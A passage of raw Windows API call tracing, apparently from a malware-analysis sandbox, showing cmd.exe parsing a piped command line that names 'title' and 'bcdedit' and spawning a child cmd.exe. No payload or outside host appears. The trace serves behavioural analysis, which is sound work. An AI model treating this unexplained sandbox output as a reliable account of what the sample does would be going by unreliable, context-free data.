(in: lpName="PATHEXT", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0046.225] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0046.225] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0046.225] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0046.226] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0046.226] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0046.226] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0046.226] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0046.226] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0046.226] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0046.226] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0046.226] GetProcessHeap () returned 0x440000 [0046.226] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4595d0 | out: hHeap=0x440000) returned 1 [0046.226] GetEnvironmentStringsW () returned 0x458b40* [0046.226] GetProcessHeap () returned 0x440000 [0046.226] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xa94) returned 0x45ad10 [0046.226] FreeEnvironmentStringsW (penv=0x458b40) returned 1 [0046.226] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0046.226] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0046.226] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0046.226] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0046.226] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0046.226] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0046.226] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0046.226] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0046.226] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0046.226] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0046.226] GetProcessHeap () returned 0x440000 [0046.226] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x5c) returned 0x45b7b0 [0046.226] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f810 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0046.226] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x26f810, lpFilePart=0x26f7f0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x26f7f0*="Desktop") returned 0x25 [0046.226] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0046.227] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f520 | out: lpFindFileData=0x26f520*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x45b820 [0046.227] FindClose (in: hFindFile=0x45b820 | out: hFindFile=0x45b820) returned 1 [0046.227] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x26f520 | out: lpFindFileData=0x26f520*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x45b820 [0046.227] FindClose (in: hFindFile=0x45b820 | out: hFindFile=0x45b820) returned 1 [0046.227] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0046.227] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x26f520 | out: lpFindFileData=0x26f520*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x13408ec0, ftLastAccessTime.dwHighDateTime=0x1d5e3d9, ftLastWriteTime.dwLowDateTime=0x13408ec0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x45b820 [0046.227] FindClose (in: hFindFile=0x45b820 | out: hFindFile=0x45b820) returned 1 [0046.227] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0046.227] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0046.227] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0046.227] GetProcessHeap () returned 0x440000 [0046.227] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x45ad10 | out: hHeap=0x440000) returned 1 [0046.227] GetEnvironmentStringsW () returned 0x45b820* [0046.227] GetProcessHeap () returned 0x440000 [0046.227] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xae8) returned 0x45c310 [0046.227] FreeEnvironmentStringsW (penv=0x45b820) returned 1 [0046.227] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49eec0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0046.228] GetProcessHeap () returned 0x440000 [0046.228] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x45b7b0 | out: hHeap=0x440000) returned 1 [0046.228] GetProcessHeap () returned 0x440000 [0046.228] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x4016) returned 0x45ce00 [0046.228] GetProcessHeap () returned 0x440000 [0046.228] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x84) returned 0x459630 [0046.228] GetProcessHeap () returned 0x440000 [0046.228] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x45ce00 | out: hHeap=0x440000) returned 1 [0046.228] GetConsoleOutputCP () returned 0x1b5 [0046.228] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49eebfe0 | out: lpCPInfo=0x49eebfe0) returned 1 [0046.228] GetUserDefaultLCID () returned 0x409 [0046.229] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49ee7b50, cchData=8 | out: lpLCData=":") returned 2 [0046.229] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f920, cchData=128 | out: lpLCData="0") returned 2 [0046.229] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f920, cchData=128 | out: lpLCData="0") returned 2 [0046.229] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f920, cchData=128 | out: lpLCData="1") returned 2 [0046.229] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49efa740, cchData=8 | out: lpLCData="/") returned 2 [0046.229] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49efa4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0046.229] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49efa460, cchData=32 | out: lpLCData="Tue") returned 4 [0046.229] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49efa420, cchData=32 | out: lpLCData="Wed") returned 4 [0046.229] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49efa3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0046.229] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49efa3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0046.229] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49efa360, cchData=32 | out: lpLCData="Sat") returned 4 [0046.229] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49efa700, cchData=32 | out: lpLCData="Sun") returned 4 [0046.229] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49ee7b40, cchData=8 | out: lpLCData=".") returned 2 [0046.229] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49efa4e0, cchData=8 | out: lpLCData=",") returned 2 [0046.229] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0046.230] GetProcessHeap () returned 0x440000 [0046.230] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x20c) returned 0x459730 [0046.230] GetConsoleTitleW (in: lpConsoleTitle=0x459730, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0046.230] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76f20000 [0046.230] GetProcAddress (hModule=0x76f20000, lpProcName="CopyFileExW") returned 0x76f323d0 [0046.230] GetProcAddress (hModule=0x76f20000, lpProcName="IsDebuggerPresent") returned 0x76f28290 [0046.230] GetProcAddress (hModule=0x76f20000, lpProcName="SetConsoleInputExeNameW") returned 0x76f317e0 [0046.231] GetProcessHeap () returned 0x440000 [0046.231] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x4012) returned 0x45ce00 [0046.231] GetProcessHeap () returned 0x440000 [0046.231] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x45ce00 | out: hHeap=0x440000) returned 1 [0046.231] _wcsicmp (_String1="title", _String2=")") returned 75 [0046.231] _wcsicmp (_String1="FOR", _String2="title") returned -14 [0046.231] _wcsicmp (_String1="FOR/?", _String2="title") returned -14 [0046.231] _wcsicmp (_String1="IF", _String2="title") returned -11 [0046.231] _wcsicmp (_String1="IF/?", _String2="title") returned -11 [0046.231] _wcsicmp (_String1="REM", _String2="title") returned -2 [0046.231] _wcsicmp (_String1="REM/?", _String2="title") returned -2 [0046.231] GetProcessHeap () returned 0x440000 [0046.231] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xb0) returned 0x459950 [0046.231] GetProcessHeap () returned 0x440000 [0046.231] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x1c) returned 0x454670 [0046.232] GetProcessHeap () returned 0x440000 [0046.232] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x22) returned 0x4546a0 [0046.232] GetProcessHeap () returned 0x440000 [0046.232] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xb0) returned 0x459a10 [0046.232] _wcsicmp (_String1="FOR", _String2="bcdedit") returned 4 [0046.232] _wcsicmp (_String1="FOR/?", _String2="bcdedit") returned 4 [0046.232] _wcsicmp (_String1="IF", _String2="bcdedit") returned 7 [0046.232] _wcsicmp (_String1="IF/?", _String2="bcdedit") returned 7 [0046.232] _wcsicmp (_String1="REM", _String2="bcdedit") returned 16 [0046.233] _wcsicmp (_String1="REM/?", _String2="bcdedit") returned 16 [0046.233] GetProcessHeap () returned 0x440000 [0046.233] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xb0) returned 0x459ad0 [0046.233] GetProcessHeap () returned 0x440000 [0046.233] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x20) returned 0x4546d0 [0046.233] GetProcessHeap () returned 0x440000 [0046.233] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x56) returned 0x459b90 [0046.234] GetProcessHeap () returned 0x440000 [0046.234] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x48) returned 0x459bf0 [0046.234] _pipe (in: _PtHandles=0x459c00, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0x459c00) returned 0 [0046.234] _dup (_FileHandle=1) returned 5 [0046.234] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0046.235] _close (_FileHandle=4) returned 0 [0046.235] _wcsicmp (_String1="title", _String2="DIR") returned 16 [0046.235] _wcsicmp (_String1="title", _String2="ERASE") returned 15 [0046.235] _wcsicmp (_String1="title", _String2="DEL") returned 16 [0046.235] _wcsicmp (_String1="title", _String2="TYPE") returned -16 [0046.235] _wcsicmp (_String1="title", _String2="COPY") returned 17 [0046.235] _wcsicmp (_String1="title", _String2="CD") returned 17 [0046.235] _wcsicmp (_String1="title", _String2="CHDIR") returned 17 [0046.235] _wcsicmp (_String1="title", _String2="RENAME") returned 2 [0046.235] _wcsicmp (_String1="title", _String2="REN") returned 2 [0046.235] _wcsicmp (_String1="title", _String2="ECHO") returned 15 [0046.235] _wcsicmp (_String1="title", _String2="SET") returned 1 [0046.235] _wcsicmp (_String1="title", _String2="PAUSE") returned 4 [0046.235] _wcsicmp (_String1="title", _String2="DATE") returned 16 [0046.235] _wcsicmp (_String1="title", _String2="TIME") returned 7 [0046.235] _wcsicmp (_String1="title", _String2="PROMPT") returned 4 [0046.235] _wcsicmp (_String1="title", _String2="MD") returned 7 [0046.235] _wcsicmp (_String1="title", _String2="MKDIR") returned 7 [0046.235] _wcsicmp (_String1="title", _String2="RD") returned 2 [0046.235] _wcsicmp (_String1="title", _String2="RMDIR") returned 2 [0046.236] _wcsicmp (_String1="title", _String2="PATH") returned 4 [0046.236] _wcsicmp (_String1="title", _String2="GOTO") returned 13 [0046.236] _wcsicmp (_String1="title", _String2="SHIFT") returned 1 [0046.236] _wcsicmp (_String1="title", _String2="CLS") returned 17 [0046.236] _wcsicmp (_String1="title", _String2="CALL") returned 17 [0046.236] _wcsicmp (_String1="title", _String2="VERIFY") returned -2 [0046.236] _wcsicmp (_String1="title", _String2="VER") returned -2 [0046.236] _wcsicmp (_String1="title", _String2="VOL") returned -2 [0046.236] _wcsicmp (_String1="title", _String2="EXIT") returned 15 [0046.236] _wcsicmp (_String1="title", _String2="SETLOCAL") returned 1 [0046.236] _wcsicmp (_String1="title", _String2="ENDLOCAL") returned 15 [0046.236] _wcsicmp (_String1="title", _String2="TITLE") returned 0 [0046.236] GetProcessHeap () returned 0x440000 [0046.236] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x4010) returned 0x45ce00 [0046.236] _wcsicmp (_String1="title", _String2="DIR") returned 16 [0046.236] _wcsicmp (_String1="title", _String2="ERASE") returned 15 [0046.236] _wcsicmp (_String1="title", _String2="DEL") returned 16 [0046.236] _wcsicmp (_String1="title", _String2="TYPE") returned -16 [0046.236] _wcsicmp (_String1="title", _String2="COPY") returned 17 [0046.236] _wcsicmp (_String1="title", _String2="CD") returned 17 [0046.236] _wcsicmp (_String1="title", _String2="CHDIR") returned 17 [0046.236] _wcsicmp (_String1="title", _String2="RENAME") returned 2 [0046.236] _wcsicmp (_String1="title", _String2="REN") returned 2 [0046.236] _wcsicmp (_String1="title", _String2="ECHO") returned 15 [0046.236] _wcsicmp (_String1="title", _String2="SET") returned 1 [0046.236] _wcsicmp (_String1="title", _String2="PAUSE") returned 4 [0046.236] _wcsicmp (_String1="title", _String2="DATE") returned 16 [0046.236] _wcsicmp (_String1="title", _String2="TIME") returned 7 [0046.236] _wcsicmp (_String1="title", _String2="PROMPT") returned 4 [0046.236] _wcsicmp (_String1="title", _String2="MD") returned 7 [0046.236] _wcsicmp (_String1="title", _String2="MKDIR") returned 7 [0046.236] _wcsicmp (_String1="title", _String2="RD") returned 2 [0046.236] _wcsicmp (_String1="title", _String2="RMDIR") returned 2 [0046.236] _wcsicmp (_String1="title", _String2="PATH") returned 4 [0046.236] _wcsicmp (_String1="title", _String2="GOTO") returned 13 [0046.236] _wcsicmp (_String1="title", _String2="SHIFT") returned 1 [0046.236] _wcsicmp (_String1="title", _String2="CLS") returned 17 [0046.236] _wcsicmp (_String1="title", _String2="CALL") returned 17 [0046.236] _wcsicmp (_String1="title", _String2="VERIFY") returned -2 [0046.236] _wcsicmp (_String1="title", _String2="VER") returned -2 [0046.237] _wcsicmp (_String1="title", _String2="VOL") returned -2 [0046.237] _wcsicmp (_String1="title", _String2="EXIT") returned 15 [0046.237] _wcsicmp (_String1="title", _String2="SETLOCAL") returned 1 [0046.237] _wcsicmp (_String1="title", _String2="ENDLOCAL") returned 15 [0046.237] _wcsicmp (_String1="title", _String2="TITLE") returned 0 [0046.237] GetProcessHeap () returned 0x440000 [0046.237] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xb0) returned 0x459c40 [0046.237] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0046.237] GetProcessHeap () returned 0x440000 [0046.237] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x28) returned 0x454700 [0046.237] GetProcessHeap () returned 0x440000 [0046.237] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x218) returned 0x459d00 [0046.237] GetProcessHeap () returned 0x440000 [0046.237] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x7c) returned 0x459f20 [0046.237] _wcsnicmp (_String1="C:\\W", _String2="cmd ", _MaxCount=0x4) returned -51 [0046.237] GetProcessHeap () returned 0x440000 [0046.237] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x420) returned 0x441320 [0046.237] SetErrorMode (uMode=0x0) returned 0x0 [0046.237] SetErrorMode (uMode=0x1) returned 0x0 [0046.237] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x208, lpBuffer=0x441330, lpFilePart=0x26f480 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x26f480*="system32") returned 0x13 [0046.237] SetErrorMode (uMode=0x0) returned 0x1 [0046.237] GetProcessHeap () returned 0x440000 [0046.237] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x441320, Size=0x48) returned 0x441320 [0046.237] GetProcessHeap () returned 0x440000 [0046.237] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x441320) returned 0x48 [0046.237] NeedCurrentDirectoryForExePathW (ExeName="C:\\Windows\\system32\\.") returned 1 [0046.237] GetProcessHeap () returned 0x440000 [0046.238] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x3e) returned 0x460e50 [0046.238] GetProcessHeap () returned 0x440000 [0046.238] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x68) returned 0x459fb0 [0046.238] GetProcessHeap () returned 0x440000 [0046.238] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x459fb0, Size=0x3e) returned 0x459fb0 [0046.238] GetProcessHeap () returned 0x440000 [0046.238] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x459fb0) returned 0x3e [0046.238] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0046.238] GetProcessHeap () returned 0x440000 [0046.238] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xe8) returned 0x461e20 [0046.241] GetProcessHeap () returned 0x440000 [0046.241] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x461e20, Size=0x7e) returned 0x461e20 [0046.241] GetProcessHeap () returned 0x440000 [0046.241] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x461e20) returned 0x7e [0046.250] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0046.250] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe", fInfoLevelId=0x1, lpFindFileData=0x26f1f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f1f0) returned 0x45a000 [0046.250] GetProcessHeap () returned 0x440000 [0046.250] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x28) returned 0x454730 [0046.250] FindClose (in: hFindFile=0x45a000 | out: hFindFile=0x45a000) returned 1 [0046.250] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0046.250] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0046.250] GetConsoleTitleW (in: lpConsoleTitle=0x26f740, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0046.258] InitializeProcThreadAttributeList (in: lpAttributeList=0x26f4f8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26f4b8 | out: lpAttributeList=0x26f4f8, lpSize=0x26f4b8) returned 1 [0046.258] UpdateProcThreadAttribute (in: lpAttributeList=0x26f4f8, dwFlags=0x0, Attribute=0x60001, lpValue=0x26f4a8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26f4f8, lpPreviousValue=0x0) returned 1 [0046.258] GetStartupInfoW (in: lpStartupInfo=0x26f610 | out: lpStartupInfo=0x26f610*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0046.258] GetProcessHeap () returned 0x440000 [0046.258] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x20) returned 0x4413b0 [0046.258] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0046.258] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0046.258] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0046.258] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0046.258] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0046.258] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0046.258] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0046.258] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0046.258] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0046.259] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0046.259] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0046.259] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0046.259] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0046.259] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0046.259] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0046.259] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0046.259] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0046.259] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0046.259] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0046.259] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0046.259] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0046.259] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0046.259] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0046.259] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0046.259] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0046.259] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0046.259] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0046.259] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0046.259] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0046.259] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0046.259] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0046.259] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0046.259] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0046.259] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0046.259] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0046.259] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0046.259] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0046.259] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0046.259] GetProcessHeap () returned 0x440000 [0046.259] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4413b0 | out: hHeap=0x440000) returned 1 [0046.259] GetProcessHeap () returned 0x440000 [0046.259] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x12) returned 0x4589e0 [0046.259] lstrcmpW (lpString1="\\cmd.exe", lpString2="\\XCOPY.EXE") returned -1 [0046.261] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="C:\\Windows\\system32\\cmd.exe /S /D /c\" title 6881369\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x26f530*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe /S /D /c\" title 6881369\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26f4e0 | out: lpCommandLine="C:\\Windows\\system32\\cmd.exe /S /D /c\" title 6881369\"", lpProcessInformation=0x26f4e0*(hProcess=0x60, hThread=0x58, dwProcessId=0x15c, dwThreadId=0x248)) returned 1 [0046.267] CloseHandle (hObject=0x58) returned 1 [0046.267] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0046.267] GetProcessHeap () returned 0x440000 [0046.267] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x45c310 | out: hHeap=0x440000) returned 1 [0046.267] GetEnvironmentStringsW () returned 0x45ae90* [0046.267] GetProcessHeap () returned 0x440000 [0046.267] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xae8) returned 0x45b980 [0046.267] FreeEnvironmentStringsW (penv=0x45ae90) returned 1 [0046.267] GetProcessHeap () returned 0x440000 [0046.267] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4589e0 | out: hHeap=0x440000) returned 1 [0046.267] DeleteProcThreadAttributeList (in: lpAttributeList=0x26f4f8 | out: lpAttributeList=0x26f4f8) [0046.267] _get_osfhandle (_FileHandle=3) returned 0x54 [0046.267] DuplicateHandle (in: hSourceProcessHandle=0x60, hSourceHandle=0x54, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0046.267] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0046.268] _close 